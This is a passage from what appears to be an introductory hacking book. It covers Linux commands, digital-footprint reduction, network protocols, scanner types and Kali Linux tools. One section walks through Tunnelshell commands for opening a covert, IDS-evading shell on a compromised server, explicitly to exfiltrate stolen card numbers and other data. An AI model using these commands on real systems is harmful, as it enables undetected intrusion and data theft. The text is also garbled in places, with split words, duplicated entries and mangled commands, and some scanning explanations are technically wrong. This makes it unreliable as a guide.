Here above is a complete list of all the basic commands you should try out. They can help you to carry out the exercises I will propose to you in later chapters. You would be better to master
them correctly.

Network command s
Working as an ethical hacker requires you have a strong knowledge of the most common network commands.

In the rest of the book, I will show you some of the most important ones. Try them out and you might even end up creating new combinations.

Command to execute: ifconfig

Explanation: utility to configure network interfaces. It will be very useful to view the IP address assigned to a machine.

Command to execute: traceroute

Explanation: this command allows you to trace the path of an IP packet to the host network. It is very useful for performing troubleshooting activities such as, for example, verifying where in
the path a certain IP packet stops or is lost.

Command to execute: di g
Explanation: this is a utility needed to query DNS. You will understand its mechanisms better in the next few chapters when I will explain what a DNS is and how we can organize an attack
against it.

Command to execute: telnet

Explanation: this command allows us to make connections to remote hosts via the TELNET protocol. I want to clarify that this protocol allows a clear visualization of data without any
encryption mechanisms. For this reason, it is not a very secure protocol.

Command to execute: telnet

Explanation: this command allows us to make connections to remote hosts via the TELNET protocol. I want to clarify that this protocol allows a clear visualization of data without any
encryption mechanisms. For this reason, it is not a very secure protocol.

Command to execute: nslooku p

Explanation: this is another utility to interrogate DNS and to perform inverse resolution queries. In our exercises, we will often use this command.

Command to execute: netstat

Explanation: this is a command of the utmost importance. It allows you to view the network connections opened at a certain time. Useful in troubleshooting, it allows us to verify anomalies due
to network connections that were not established or lost. Here again, take some time to improve your knowledge of this tool.

Command to execute: ifup, ifdown

Explanation: this command allows you to enable or disable network cards. It can be very useful in certain situations, perhaps when a reboot of network services is required.

Command to execute: pin g

Explanation: the PING command is used to check whether a certain host is active or not by sending special ICMP type packets to it and waiting for a response.
Command to execute: arp -a
Explanation: the ARP -A command provides us with a table of the links between a MAC address and an IP address. For example, it can be used when we want to exclude problems concerning
the lower levels of the ISO/OSI model (data level).

Here are all the commands related to networking. Of course, this list does not include them all, there would be much more to say. However, you will do great later if you begin to become familiar
with these commands.

Commands related to system management

Command to execute: uptime
Explanation: this command shows you for how long a certain system has been active.

Command to execute: user s

Explanation: this command shows the user names of users connected to a system.
Command to execute: who / whoami
Explanation: this is another command that informs us of how many users are connected to the system as well as some additional information.

Command to execute: crontab -l

Explanation: this command allows the display of scheduled jobs related to the current user. We will see later what the jobs are.

Command to execute: less / more

Explanation: this command is very useful because it allows you to quickly view a file. Press the "q" key to exit this particular display.

Command to execute: ss h
Explanation: this command allows the connection to a remote host via an SSH protocol. The latter, unlike the TELNET one, carries out data encryption. For this reason, in the event of traffic
interception, it will not be possible to clearly see any data.

Command to execute: ftp

Explanation: this command allows the connection to an FTP server via the FTP protocol. This protocol does not perform data encryption, so you need to pay attention when using it.

Command to execute: service start / stop

Explanation: this command allows you to start or stop a certain service. You will use it on many occasions.

Command to execute: service start / stop

Explanation: this command allows you to start or stop a certain service. You will use it on many occasions .

Command to execute: free -h

Explanation: this command shows the amount of free and used memory. For example, it can be used when there are performance problems on a machine.

Command to execute: top

Explanation: this command allows you to check the active processes in a system. It can be useful if a machine is running very slowly for no apparent reason.
Command to execute: ps
Explanation: with this command you can view the active and running processes in a system.
Command to execute: kill
Explanation: this command is used to terminate a certain process. However, it is necessary to first identify the PID related to that specific process.
Chapter 3 : What is the use of logging for hackers

Daily, without our knowledge, most of our Internet use contributes to a growing portrait of who we are online. This portrait of you is more public than you think it is. Whenever we look at the
Internet for information, it looks as if the Internet is looking back it us. We always leave something behind when we use websites for gathering information, sending emails or messages, social
sharing etc. All these traces that we leave on the Internet are termed digital footprints .
Digital footprints bring both benefits and costs. They offer the convenience of saving time by auto-filling the personal details when logging in into an account. The user does not have to retype all
their details when logging in. Most users using the services of several companies realize that they are sharing the information consciously on social media sites. By uploading pictures, you can
say that some degree of your privacy is lost. Footprints can be created by default when you're shopping online or searching for something on Internet. Even by enabling your location services,
digital footprints can be created. And, if you cannot see it, you cannot manage it. Using this portrait, companies target specific content to specific markets and consumers. This portrait also helps
employers to look into their employees’ backgrounds. Advertisers use digital footprints to track the movements of the users across websites. In simple words, whenever you go online and do a
task, you will leave your digital footprint behind.
There are different kinds of digital footprints, and it is wise to know about them and their effects.
You should know that you can never bring your footprint count to zero. But following a few steps can reduce it. With those steps, managing your digital identity won't be hard.
Basically, the digital footprints of a user are the traces or stuff that they leave behind. Comments that you make on social websites like Facebook, email and application use, Skype calls, etc., all
leave footprints. Other people can view them from a database. Here are some of the ways that you leave digital footprints.
Websites and Online Shopping
Product review sites and retailers often leave cookies on your computer. These cookies store your information and they can be used for tracking your movements from site to site. Advertising
companies use these cookies and display advertisements related to your recent web searches online.

Social Media
Every one of those comments on Facebook, tweets on Twitter and +1s on Google plus leave a digital footprint. You can control these by keeping an eye on the default privacy settings set by your
social media sites. They release new policies and settings, which result in the increase of your data visibility. Most of the people click OK at the end of the policy agreements without reading
them.

Laptops, Tablets and Mobile Phones

There are websites that keep a list of devices that you have used for logging into their sites. That information is basically for securing your account. You should know that it is for your security
and they are also storing information about your habits.

How Big Is My Footprint?

If you are interested in knowing how big your digital footprint is, there are several tools available for your use online. They can be accessed easily and you can add them to your system. They
help in monitoring your footprints constantly and can help control it. Google is listed as one of the companies accused of collecting lots of user data. You can also measure the size of your
footprint by having a look at how many advertising companies are permitted to track your browsing habits. Though you may not recollect permitting any of those advertising companies to place
their cookies on your computer, some sites do it without asking the user. Cookies are nothing but small chunks of data that are created by web servers. These are stored on your computer and
your web browser delivers them. Your preferences will be saved along with your online patterns in these cookies by the websites you frequently visit. Websites use this information for giving
personalized experience to the users visiting them.
Another method with which you can obtain a simple estimate on your footprint is by using the Digital Footprint Calculator. The EMC Corporation provides this service for both the Microsoft
Windows and Mac operating systems. The user inputs the frequency of photo uploads, video uploads, phone usage, web browsing, emails, and your location information, and all this is considered
by the software. After considering all of these, the calculator provides you with the actual file size of your presence on the Internet.
Here are 10 steps that will help you to erase your digital footprint.

1. Search yourself.
Searching for the applicants on the Internet has become a customary practice for employers before recruiting them. All of this information is given by search engines like Google and can be seen
by anyone searching for you. If you search yourself on the net, there is the possibility of finding all the websites in which you have an account. You should also search for images. Getting an
understanding of your footprint is the first step toward controlling it.

2. Deactivate your old social media accounts and check the privacy settings.
Facebook, Google+, LinkedIn, Twitter, MySpace, etc., are some of the social media sites that can be mined for personal information. If your privacy settings are not tight, viewers can get a look
at your pictures, status updates, and posts that are in your personal life. You should always remember that the open web forgets about context and your posts can be misconstrued. There is a
possibility of events happening years ago hampering your prospects. Although you’re personal life is separate from your professional life, your profile may not interest the people who are trying
to hire you. You should always check your privacy settings of accounts in which you are active. For example, if it is your Facebook account, you can go to the account settings on the top right
corner of your page and select the privacy option from the list. Here you can decide who can access your information, which can search you using your mobile number or email address, etc.

In the case of Twitter, you can get to the settings by clicking on your avatar on the top right corner of your profile. This provides you with a range of account options and you can also make your
profile private. Not adding your last name, or by using a different last name can completely hide your account.

3. Hide other information or add false information.

Honesty is not considered the best policy when you are dealing with accounts in social media sites if you wish to maintain a low profile. Some social media sites only allow you deactivate your
account, but not to delete it completely. You should change your information as much as possible in such cases. Information like your profile name, email address, and profile picture should be
changed before you deactivate your account. And if anyone tries to search for you, they will only be able to see the information you updated recently.

4. Contact webmasters
You can remove your information by contacting the website's webmasters and it is one of the best options available. You can ping them or mail them, explaining your situation in detail and they
might be able to help you remove your information if they find your reason valid. You will have to confirm that it is your account by calling them from a registered phone number, or sending a
mail from a registered email address.

5. Unsubscribe from mailing lists.

Always keep in mind that the mailing list will leave a trail back to you. By unsubscribing from such mailing lists, you can break those connections. Doing this will help you to de-clutter your
primary inbox as well .

6. Have a secondary email account.

Most services nowadays require your email address in order to sign up before using a website. For registering on such websites, it is wise it to create a secondary email account instead of giving
your primary email address. They sometimes insist on sending you emails for their sales pitches and marketing campaigns. By using your secondary email address, you can keep your digital
footprints clean.

7. Consider the “right to be forgotten.”

The European countries have recently implemented the “right to be forgotten” policy. Using this policy, you can delete your information from search engines, which publicly display your
information. Google has removed many such links.

8. Check e-commerce and retail accounts.

In cases where you are not using your retail accounts like eBay or Amazon, or in cases where you have created a new account and stopped using your old account, consider removing those
accounts and your financial data saved in them. Cyber-attacks have become common on major retailers and their services. If you are not using those accounts, there is no point in keeping your
sensitive data on the company's servers. It is wise to remove them.

9. Cover your tracks.

Big IT companies like Apple and Google recently stated that they would be enhancing the basic encryption in their services. With this, there are a number of ways that will help you to be less
traceable. Despite the startup claims on the anti-NSA bandwagon, you should know that there is no complete solution for you to be surveillance-proof. For normal usage, using private browsing
provided by Internet Explorer, the incognito mode of Google Chrome and Firefox's private window will definitely help you in limiting traceable data like cookies.

10. Make a fresh start.

This can be considered an extreme action where you delete all the aforementioned services, delete all the emails in your inbox, etc. For removing your digital footprint, this is considered the best
way. Though only a little will be forgotten, if you falsify your name in the social media accounts that you are using, set tighter security settings, clear your e-commerce accounts and the emails
from your inbox, will definitely contribute to clearing your presence from the web.
The Big Three Protocols- Required Reading for Any Would-Be Hacker
In this chapter; I will give you an overview of ICMP, TCP, and UDP, the three most important ones. Then, later, I will show how to create a covert channel that is pretty much undetectable using
Tunnel shell and Kali Linux.
ICMP – Internet Control Message Protocol
ICMP is used by devices like routers to report errors and generate messages that go to the source IP. The messages inform the IP when an error stops IP packets being delivered. ICMP will create
the messages and send them, indicating that a service; router or Host cannot get through a gateway to the internet. Any IP network device can send these messages, and to receive and process
them. ICMP is not classed as a transport protocol for sending data from one system to another.
ICMP doesn’t tend to be used that regularly in end-user applications; it is much used by network admins for troubleshooting internet connections. Because it is one of the main protocols, ICMP
tends to be used by hosts, routers or intermediary devices to tell other devices, hosts or routers of any errors or updates. Both IPv4 and IPv6 use similar versions called ICMPv4 and ICMPv6.
ICMP messages are sent as datagrams and have an IP header that holds the data An ICMP packet is an IP packet that has ICMP within the IP data section. ICMP messages also have the IP header
from the original message so that the receiver will always know which of the packets has failed. The header is found after the IPv4 or 6 packet headers and it has an identification of IP Protocol
1. This protocol is complex, with three fields:
The type that will identify the ICMP message
The code that has more information regarding the type field
The checksum used to find errors that are introduced while the message is transmitting
After these fields come the ICMP data and the IP header, showing which of the packets has failed. ICMP has also been used as a way of executing DoS attacks by sending IP packets that are
larger than the maximum number of bytes the IP protocol allows.

TCP – Transfer Control Protocol

TCP is the defining standard for establishing and maintaining network conversations where applications exchange data. TCP works with the IP protocol and this is what defines the way
computers send data packets to one another. Working together, IP and TCP are the rules for how the internet is defined. TCP is a protocol that is connection-oriented, meaning the connection,
once established, is maintained until the applications at either end have completed the exchange of messages. TCP will determine how the application data should be broken down into packets
that can be delivered by networks. It will also send packets to the network layer and accept them from the layer, manages the flow of control and because it is designed to provide data
transmission that is free from errors, it will handle the retransmission of packets that are garbled or dropped as well as acknowledging all the packets as they arrive.
TCP is responsible for covering parts of the Transport Layer (layer 4) and parts of the Session Layer (layer 5) in the OSI (Open Systems Interconnection) communication model. For example,
web servers use the HTTP protocol to send HTML files to clients. The HTTP program layer will request that the TCP layer sets the connection up and send the file. The TCP stack will then
divide that file up into packets of data, gives each one a number and then sends them on, one at a time, to the IP layer so they can be delivered. While each of the packets has the same source IP
and the same destination IP, they may go via several routes. The TCP layer from the client system waits for all the packets to get there and then acknowledges them, puts them all together as a
file and sends it to the receiving application.
UDP – User Datagram Protocol
UDP is an alternative to TCP and is used mostly for establishing connections that are loss-tolerant and low-latency. These connections are between internet applications. Both TCP and UPD run
atop the Internet Protocol and are often referred to as TCP/IP or UDP/IP. Both protocols send datagrams, which are short data packets.
UDP provides services that IP doesn’t – port numbers, which help to distinguish between different requests from users and Checksum, the capability to check that the data arrives in one piece.
TCP is the dominant protocol for most of the internet connectivity and this is down to the fact that it can break large data packets into individual ones, check for lost packets and resend them, and
then reassemble them in the right order. However, this comes at a cost of extra overhead in terms of data and latency delays. By contrast, UDP only sends the packets and that means it takes less
bandwidth and suffers lower latency. However, it is possible for data to be lost or received in the wrong order and this is due to the fact that the individual packets take several routes.
UDP is ideal for network applications where latency is critical, like video and voice communication or gaming, where data can be lost without affecting the quality too much. Occasionally,
techniques for forwarding error corrections are used to provide better video and audio quality, even though some data has been lost.
UDP is also used where applications need lossless transmission of data, where the application has been configured to manage the retransmission of lost packets and the arrangement of packets
that are received. This helps to boost large file data transmission rate when compared to TCP.
How to Use Tunnelshell To Create a Covert Channel That Is Almost Undetectable:
More often than not, professional hackers are looking for protected information from a target network or system. This could be bank details, cred or debit card numbers, information that is
personally identifiable or intellectual property, like designs, blueprints, plans, etc. While you might be able to get into that system, the question is, what do you do when you are in there?
Hackers need a way to get the information they have gleaned out of the network or system and they want to do this in a way that is not detectable by any security services or security admin. I am
going to show you how to use a tool called Tunnelshell to get data out of a network with next to no chance of detection.
How Tunnelshell Works
Tunnelshell is a neat program that will only work on Linux or UNIX servers that have been compromised. A high percentage of corporate servers run on a UNIX distribution, such as Linux,
Solaris, IRIS, HP-UX, AIX, etc., so there shouldn’t be any significant problems in removing data using Tunnel shell. However, it will only work on the big servers, not a small or even a medium
one that runs on Windows Server.
Tunnel shell works over several protocols, including UDP, TCP, RawIP and ICMP. It is also able to break packets up so it can get past an intrusion detection system and a firewall. In UDP and
TCP modes, Tunnel shell does not need to be bound to a port or a socket so, if the target were to run netsat, it wouldn’t show any open ports – it would show up in the process list though. In TCP
mode, no IP address is logged because three-way handshakes are executed .
In ICMP mode, Tunnel shell will use ICMP Echo Request/Echo Reply to transport data and, because of this, it will show as a continuous ping that goes between systems. Many firewalls and
routers will block incoming ICMP but they rarely block outgoing ICMP because ping is needed by admins and users to find the active hosts.
How to use Tunnel shell for a Covert Channel
You will need to download Kali for this and Tunnel shell is not included – it isn’t possible for the developers to include everything. This tutorial will show you how to build a tunnel between Kali
and a Linux system that has been compromised. We are going to use BackTrack 5v3 as the target but you can use any of Linux or Unix distributions.
Open Kali
The first step is to download Tunnelshell. Under normal circumstances we would use the apt-get command or the Add/Remove Software utility on Kali but, as Tunnelshell isn’t in Kali, we can’t
do either. The easiest way is to get straight to the website and download i t
So, open http://packetstormsecurity and download Tunnelshell – it is a compressed .tar file with the extension .tgz. This means it must be uncompressed and untarred before it can be used. It must
be downloaded onto the target system and to your own Kali system. Put it in whatever directory you want so long as you remember where it is and remember to run the commands from that
directory.
Untar and Uncompress
Type the following command in at the prompt to unpack Tunnelshell:
kali > tar xvfz tunnelshell_2.3.tgz
Type the following command to compile the tool:
kali > make
Activate Tunnelshell on the Target
Now that Tunnelshell has been downloaded and compiled n the target, all you need to type at the prompt is:
kali > ./tunneld
This will open the server on the target. As no switches were used when Tunnelshell was activated, it will use packet fragmentation in the default configuration. The beauty of this is that packets
are broken down into pieces and reassembled when they reach the destination and this is one of the best methods for getting past almost every IDS and firewall without being detected.
Connect to the Tunnel
To do that just type:
kali > ./tunnel -t frag 192.168.89.191
● -t is the switch that goes before the tunnel type
● Frag defines the type
● 192.168.89.191 is the target IP address in this case
Tunnelshell will now connect but you won’t get a command prompt; instead, you get a blank line. Now you can type in any Linux command and the output will be returned as if you were
working at the Linux prompt. For example, type in pwd for Present Working Directory, and the return will be the directory that tunnel is running on the target. If you now type in ls-l, you will get
a list of the directory and you can now go ahead and input any Linux command you want.
Attempt to Detect Tunnelshell on the Target
Now you have your tunnel it’s time to see if the target is able to detect it. Go to the target system and, as sysadmin, see if you can find the tunnel. Try it with netsat – this shows all connections on
the computer but you should not be able to see Tunnelshell.
Other Configurations
We used Tunnelshell’s default configuration for fragmented packages but it can also use other configurations, which could be more useful, based on the circumstances:
ICMP
To run in ICMP, start the server by typing:
./tunneld -t icmp -m echo-reply
And start the client by typing:
./tunnel -t icmp -m echo-reply, echo <IPaddressoftarget>
UD P
Start the server by typing:
./tunneld -t udp -p 53, 2000
Start the client by typing:
./tunnel -t udp -p 53, 2000 <IPaddressoftarget>
TCP
Start the server by typing:
./tunneld -t tcp -p 80, 2000
Start the client by typing:
./tunnel -t tcp -p 80, 2000 <IPaddressoftarget>
Chapter 4 : How to scan the server and the network

Hacking tools are software programs that are designed with one specific purpose, to allow hackers to gain unauthorized admission to a network or system. There are many hacking software
packages that you can make use of to make the job simpler and then move on to tougher techniques. But if you are really desperate and wish to crack a password, it is best that you consider using
hacking software.
The different types of hacking tools are as follows:

Vulnerability scanners

Port scanners

Web application scanners

Password cracking tools

Packet sniffers

Vulnerability Scanner
Vulnerability is defined as an unintended software flaw that can be used as an opening by hackers to send in malicious software like Trojan horses, viruses, worms, etc.
A vulnerability scanner is a very efficient tool used for checking weak spots in a network or a computer system. It is basically a computer program. The sole purpose of the scanner is to access
networks, applications, and computer systems for weaknesses. Both black hat hackers use this and computer security managers, who are usually white hat hackers or blue hat hackers, use this.
The black hat hackers use it to find weaknesses and gain unauthorized access from those points. White hat hackers also check for weaknesses, but they do it to protect the computer systems rather
than to gain entry .
The data is transmitted through ports. The vulnerability scanner is used to check the ports that are open or have available access to a computer system. This is used for quickly checking the
network for computers with known weaknesses. By limiting the ports, the firewall defends the computer, although it is still vulnerable.
Benefits of Vulnerability Scanners

Early detection of problems

Security vulnerabilities can be identified easily

As it shows the vulnerabilities, they can be handled

Types of Vulnerability Scanners

Port Scanner
A port scanner is a computer application that is designed solely for searching open ports on a host or a server. The person who intends to use this should have basic knowledge of TCP/IP. The
attackers use it to identify services running on a server or a host with the intention of compromising it. The administrators, on the other hand, use it to verify their network's security policies. A
port scan is a process that sends requests to a selected range of ports with the goal of finding an active port. This can only find vulnerability and cannot be used for attacking or protecting. Most
of the uses of this scan are to probe rather than attack. One can use the port scanner to scan multiple hosts in order to find a specific listening port. This process is called port sweep. These are
particularly used for a specific type of service. One of them is a computer worm, which is SQL based. It may be used to port sweep ports that are listening on TCP.

Types of port scanning:

TCP scanning
These simple port scanners use the operating systems’ network functions when a SYN scan is not possible. This is called for when we scan by the Nmap (discussed in later chapters). The
computer's operating system will complete a three-way TCP handshake and then the connection will be closed immediately to avoid a DoS attack. An error code will be returned otherwise. The
advantage of this mode of scanning is that the user doesn't need any special privileges. However, this type of scanning is not very common, as the network function of an operating system
prevents low-level control. In addition, this kind of scanning is considered to be 'noisy' when using port scans. Therefore, this type of scan is not the preferred method, as the intrusion detection
systems can log the IP address of the sender.

SYN scanning
This is also a type of TCP scan. Here, the port scanner will generate raw IP packets by itself and will monitor for responses instead of using the network functions of the operating system. SYN
scanning is also called "half-open scanning." This is so called because a complete TCP connection will never be opened. The SYN packets will be generated by the port scanner. The scanner will
send a SYN-ACK packet when an open port is found. The host will close the connection before completing the handshake by responding with an RST packet.
There are several advantages when we use raw networking. They are

1. The scanner gets complete control of the packets sent.

2. The connection will not be received by the individual services.
3. Scanner gets complete control of the response time. This type of scanning is recommended over TCP scanning.

UDP scanning
UDP scanning is a connectionless protocol. Though this type of scanning is possible, there are technical challenges. A UDP back up will be sent to the closed port and the post will respond with
an ICMP response saying that the port is unreachable. The scanner looks for the ICMP responses. If there is no response from the host, the port is open. However, if the host is protected by a
firewall, the scanner will receive a response saying that there is an open port, which is false. The ICMP rate limiting will also affect this method. All the ports appear to be open if the message is
blocked. For this we can send some application-specific UDP packets as an alternative and hope that the application layer response is generated .

Window scanning
This method is outdated and is rarely used. But window scanning is fairly trustworthy and can determine if a port is closed or open, filtered or unfiltered. This method can be used if there is a
firewall on the host's system.
Network vulnerability scanner
This type of scanner identifies the vulnerabilities in the security of a computer system that is connected to a network in order to tell if that particular system can be exploited or threatened. It is
software that has a database of known flaws. It'll scan the computer system for these known flaws by testing the system in order to make these flaws occur. Then it will generate a report of all
these findings on that individual computer system, or a given enterprise.
Web application scanner
There are many ways in which architectural flaws and safety fallbacks can be checked. One such method is a web application security scanner, which acts as a communicator between the user
and the application and identifies these issues. There are many tests that a scanner can perform to find these vulnerabilities in web applications.
The most frequently used test is the black box test. This means that the user will have no idea what the logic behind the result is but will have clear-cut information about results that will give the
complete information required. Mostly these scanners analyze by throwing random test cases that might occur in real-life scenarios and give results. These web applications are mostly
entertained by users because they act as an easy platform to communicate with the system and therefore the user interface of these web applications play a major role in the success of an
application.
There are multiple actions the user can perform using these applications; among them are creating an account, querying the database by giving search criteria, adding a lot of required content, and
also making different types of transactions. When there is a lot of information being stored, the user tends to store some of their personal information in these applications as well.
It seems like an easy, convenient option but the fact that the security of the data is being compromised is one that most users tend to miss. And this is the very fact that the insider leaks and
hackers cash in on. So it is not just the convenience that the user has to see, but they also need to make sure they keep a check on the extent of information they are sharing on these web
applications.
There are many various strengths of web application scanners; here are a few of them:

They come in handy for last-minute hurried checks for flaws.

They can check a lot of possible results that may be obtained when the same scenario is given different inputs and then they can recognize the anomalies.

The tools that are used for web application testing, such as scanners, are independent of the programming language used. So, irrespective of the language that the web application is coded in, the
tool can work in its own way, dynamically changing the inputs for different languages. This gives the users complete freedom to test all their applications.
Where there are strengths, weaknesses exist too. Here are a few of the weaknesses:

One of the major weaknesses of these tools is that the hackers use the same tools. So if the users are able to find flaws in the system, the hackers can find
them easily, too. This poses a major threat to the community.

Many updates are being made to the languages that are used in designing web applications and most of the users use tools that are available for free. These
free tools are normally built to a basic level, so new modifications and updates will not be available. Therefore, the random inputs that are being thrown at
the system to find the anomalies will not have the updated inputs. This means there are a lot of potential threats that can be caused because of these missing
inputs.

There is a high chance that the first few tools will have zero results; this causes high anxiety in the users, which will ultimately result in them using the new
tools. This will cause the creation of new tools and the extinction of old tools.

The excessive use of the tools can also be a problem, as it will help the attackers to check their test cases theoretically. It makes it easy for them to send
botnets. These cause spam in the web applications that might lead to information leakage.

The malware used by the attackers can be updated using these botnets. This type of updated malware can be very difficult to remove.

As already mentioned, the software that is being used in web application designs is constantly being updated and the tools that are being used are
dynamically programmed depending on the language that is being used by the web application. No one can give a 100% guarantee that the results obtained
belong to the whole source code. To get the complete coverage of the web application there are testers, called penetration testers, who carefully and closely
analyze the results to verify that the entire source code of the web application has been covered.

The users must be aware that these tools will not be able to detect logical flaws in the source code, such as leakage of information and low level of
encryption of the data.

These tools also have a difficult time detecting any technical flaws. It doesn't mean that they are incapable of doing so, but the web application has to
provide the right clues to enable these tools to identify the technical flaws.

Password Cracking Tools

The process of recovering passwords is known as password cracking. It is done on passwords that are transmitted and stored in the computer system. With this, one can gain access to a computer
system by gaining the password of the user. The time required for cracking a password depends entirely on the strength of the password used. Most of the methods used usually require the
computer system to produce many passwords, which are then checked individually.
There are a lot of methods for cracking passwords. Brute force is one of them. It is a time-consuming process that uses all possible combinations of letters and words until it succeeds. In methods
like word list substitution, dictionary attacks are performed before using brute force. The password cracking tools make the process very easy.
Packet Sniffers
Packet sniffers are also called protocol analyzers, packet analyzers, or network analyzers. They are pieces of hardware or software that are used to intercept and log the digital traffic passing over
a network. Packet sniffers are used for capturing and, if needed, even decoding the packet's raw data. It later uses the captured data and analyzes it for information. Some packet sniffers act as
reference devices by generating their own traffic. The protocol analyzers are not limited to the software side. There are also hardware-based protocol analyzers. Advantages of packet sniffers can
be given as follows:

You can analyze network problems.

Packet sniffers help in detecting the misuse of network by external or internal users.

Network intrusion attempts can be detected.

You can debug the network protocol implementations.

The data in motion can be monitored.

Exploited systems can be isolated.

Network statistics can be gathered and reported.

The proprietary protocols used can be reverse-engineered over the network.

Packet sniffers can be used for spying on users on the same network. Sensitive information like user cookies or login details can be collected.

The client-server communications can be debugged.

The suspect content from the network traffic can be filtered.

Moves, additions, and changes can be verified.

The effectiveness of the internal control systems like the firewalls, spam filters, web filters, etc., can be verified.

Popular Hacking Tools

The following are some well-known hacking tools (software) that make the tedious process of hacking a lot easier.
Cain and Abel

This is a popular hacking tool that helps in the recovery of passwords from systems running under Windows OS. This software recovers passwords by sniffing networks through cryptanalysis.
This tool also relies on the brute force method for achieving the required results. VoIP (Voice over IP) conversations can be hacked and recorded using this hacking tool. Some of the tasks that
can be performed by this tool are:

It can decode passwords that are in a scrambled form.

It can calculate hashes on strings (a set of characters/a word). A hash is a code generated by using a mathematical function on a string. Passwords are
usually hashed before storing them in the database.

It can crack most of the widely used hashes.

John the Ripper

This well-known tool helps in password cracking by matching a string with the correct password that has locked the system. In general, passwords are not stored in the database in their original
form. If passwords are stored as they are, it is easy for hackers to steal them and break into the system, so passwords are encrypted and then stored in the database.
Encryption is the technique in which an algorithm or a mathematical formula is used to convert data into a form that cannot be understood. What actually happens is the hacker provides this tool
with a string that they think could be the password to the system. This tool then performs encryption on the string using the same encryption algorithm that has been used to store the actual
password. It then matches the encrypted string with the actual password, which is present in the database in its encrypted form. This tool can also take words from the dictionary as input.
Wireshark
This tool works by capturing and analyzing the network/data traffic, which may contain sensitive information like usernames/passwords or confidential files. It sniffs the required data packets in
the network traffic, captures them, and sends them as output to the person who hacked it. Such tools are called packet sniffers. Also, network administrators can search for weak spots by
troubleshooting the network using this tool.
Nessus
Nessus is a tool that scans a system for vulnerabilities. The hacker provides this tool with the IP address of the system they intend to hack. Then, the tool scans the system, identifies its
vulnerabilities, and delivers them to the hacker. After analyzing its vulnerabilities, the hacker can attack the system using other suitable hacking tools. Both Windows OS and Linux OS support
Nessus .
Nmap
Nmap is a tool that scans the network for hosts (computers that form the network). Some of the tasks that can be performed by Nmap are as follows:

It identifies the hosts present on a network by sending them some special IP packets and examining their responses.

It provides a list of ports that are open on a specific host.

It can determine the name of an application running on a network device and its version number.

It can determine the operating system on which the devices in a network are running.

Hacking Hardware
And you thought only software could do the job for you. Hacking hardware is a network of computers that will all work together to help find your password. These networks can be rented for a
fee and will work at lightning speed to find your password. They are better known as botnets and are meant only to serve the purpose of cracking passwords.
Similarly, graphical processing units (GPUs) are designed to help hack a password and are much more powerful than your regular CPUs. GPUs make use of a video card to find your password at
a superfast speed.
Apart from these, there are also small devices that have been built to cater to hacking account passwords. They might look small but will work faster than a few hundred CPUs all combined.
These will make for great gizmos but you must be willing to shed upwards of $2000 to buy a single unit.
Tools in Kali Linux
In this section we will go through the various tools available in Kali Linux for security and penetration testing. There are a number of tools in Kali which are classified as per the task that they are
used for. They are as follows.

Exploitation Tools
 Forensics Tools
Information Gathering Tools
Reverse Engineering tools
Wireless Attack Tools
Reporting Tools
Stress Testing Tools
Maintaining Access Tools
Sniffing and Spoofing Tools
Password Attack Tools
We will go through tools available on Kali Linux for all the categories one by one and understand the purpose of each tool and how it will help us in the security domain.
Exploitation Tools
On a network of computers, usually over the Internet, there are several web applications, which leave a system vulnerable due to bad code or open ports on the server which are publicly
accessible. Exploitation tools help you to target a system and exploit the vulnerabilities in that system, thus helping you to patch vulnerability. Let’s go through all the Exploitation Tools
available in Kali Linux one at a time.
Armitage
Armitage was developed by Raphael Mudge to be used with the Metasploit framework as its GUI frontend. Armitage is a tool that recommends exploits and is fairly simple to use as cyber-attack
management tool which is available in the graphical form. It is open source and available for free security tool and is mostly known for the data it provides on shared sessions and the
communication it provides through a single instance of Metasploit. Armitage helps a user to launch exploits and scans, get recommendations of exploits and explore the advanced features that are
available in the Metasploit framework.
The Backdoor Factory (BDF)
The Backdoor Factory is a tool commonly used by researchers and security professionals. This tool allows a user to include his desirable code in executable binaries of a system or an application
and continue execution of the binaries in normal state as if there was no additional code added to it.
You can install this tool on your Kali Linux system using the following commands on the terminal.
apt-getupdate
apt-getinstallbackdoor-factory
The Browser Exploitation Framework (BeEF )
The Browser Exploitation Framework is penetration testing tool built for testing exploits on the web browser. There has been an observation wherein web browsers have been targeted using
vulnerabilities on the client-side. BeEF helps the user analyse these attack vectors on the client side. Unlike other tools, BeEF focuses on assessing the Web Browser which serves as an open door
and it looks past the network layer and client’s system.
Commix
Providing use cases for penetration tester, web developers, and researchers, Commix (short for COMMand Injection eXploiter) works in a simple environment to test web applications. It
basically allows a user to find the errors, bugs or vulnerabilities with respect to command injections in web applications. This tool easily allows you to identify and exploit a vulnerability of
command injection. The Commix tool has been developed using the Python language.
Crackle
The Crackle tool in Kali Linux is a brute force utility used for cracking and intercepting traffic between bluetooth devices. Most bluetooth devices have a 4-6 digit pairing code, which is in an
encrypted format. Using Crackle, these codes can be decrypted if the pairing process between 2 devices is intercepted and thus allowing you to listen to all communication happening between the
2 devices.
jboss-autopwn
JBoss Autopwn is a penetration testing tool used in JBoss applications. The Github version of JBoss Autopwn is outdated and the last update is from 2011. It is a historical tool and not used
much now.
Linux Exploit Suggester
The Linux Exploit Suggester tool provides a script that keeps track of vulnerabilities and shows all possible exploits that help a user get root access during a penetration test.
The script uses the uname -r command to find the kernel version of the Linux operating system. Additionally it will also provide the -k parameter through which user can manually enter the
version for the kernel of the Linux operating system.
Maltego Teet h
Maltego is a tool that is used for data mining and is interactive. It provides an interactive interface that outputs graphs which help in link analysis. Since it allows link analysis, Maltego is used for
investigations on the Internet to find the relationship between information that is scattered over various web pages on the Internet. Maltego Teeth was developed later with an added functionality
that gives penetration testers the ability to do password breaking, SQL injections and vulnerability detection, all using a graphical interface.
sqlmap
sqlmap is a Kali tool that is open source and is used for penetration testing. It allows automating the detection of SQL injection vulnerabilities and exploiting it to take over database servers. It
comes equipped with a very powerful detection engine, a range of tools which will help an extreme penetration tester and switches that help fetch information like database fingerprinting,
retrieving data from databases, access to the file system of the operating system and execute commands on the operating system.
Yersini a
Yersinia is a tool that detects exploits weaknesses in network protocols and takes advantage of it. It is a tool which is a solid framework for testing and analyzing deployment of networks and
systems. It comprises of layer-2 attacks which exploit the weaknesses in various layer-2 protocols in a given network thus allowing a penetration tester to detect flaws in a layer-2 network.
Yersinia is used during penetration tests to start attacks on network devices such as DHCP servers,switches, etc which use the spanning tree protocol.
Cisco-global-exploiter
The Cisco Global Exploiter (CGE) tool is a security testing exploit engine/tool, which is simple yet fast and advanced. Cisco switches and routers have 14 vulnerabilities which can be exploited
using the Cisco Global Exploiter tool. The Cisco Global Exploiter is basically a perl script, which is driven using the command line and has a front-end that is simple and easy to use.
Cisco-torch
The Cisco Torch is an exploitation tool which varies from the regular scanners in the sense that it can be used to launch multiple and simultaneous scans at a given point in time which results in
